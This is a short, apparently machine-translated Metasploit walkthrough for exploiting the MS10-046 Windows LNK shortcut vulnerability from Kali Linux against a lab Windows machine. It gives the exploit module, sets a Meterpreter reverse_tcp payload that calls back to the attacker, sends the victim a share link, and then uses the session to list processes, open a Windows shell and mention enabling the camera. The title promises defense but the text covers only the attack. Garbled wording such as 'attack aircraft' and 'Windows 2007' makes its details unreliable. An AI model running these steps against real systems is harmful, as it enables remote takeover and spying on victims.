MSF penetration using the framework to achieve LNK file shortcut vulnerability offense and defense
Experimental environment:
Attack: kali Linux
drone: Windows 2007 / Windows XP
1, open kali Linux, the command line to open msf:
2 by search ms10-046 # inquiry vulnerability module
3, through the use exploit / windows / browser / ms10_046_shortcut_icon_dllloader # enter the vulnerability module
4, set the payload connection victim machine, bounce a connection back to Kali Linux:
the sET payload Windows / Meterpreter / reverse_tcp
5, setting the attacker is kali Linux's ip and bounce connections back IP address:
the sET srvhost kali Linux the attackers set # ip ip
the sET lhost attack aircraft (since bounced back to their machines up) # set ip address bounce back, that kali Linux
other parameters default.
6, carry out an attack to generate a shared connection:
7, shared copy down the link, so that access to the victim machine:
drone interface (2003 episode appears midway temporary replacement of 2007 but does not affect this experiment), there were two files
attack aircraft At this point you can see the interface echo the information rebound:
8, according to the connection session -i # View conversation back can keep up with the numbers, assuming that view to keep up with a 1:
we can also see it in the process according to this ps command:
You can also call other command to get help command help, such as turning on the camera and the like, in view of the drone is not in a virtual machine so this demonstrates:
can enter the Windows shell by typing cmd computer users by name - Administrator can determine is super administrators can perform all commands Description: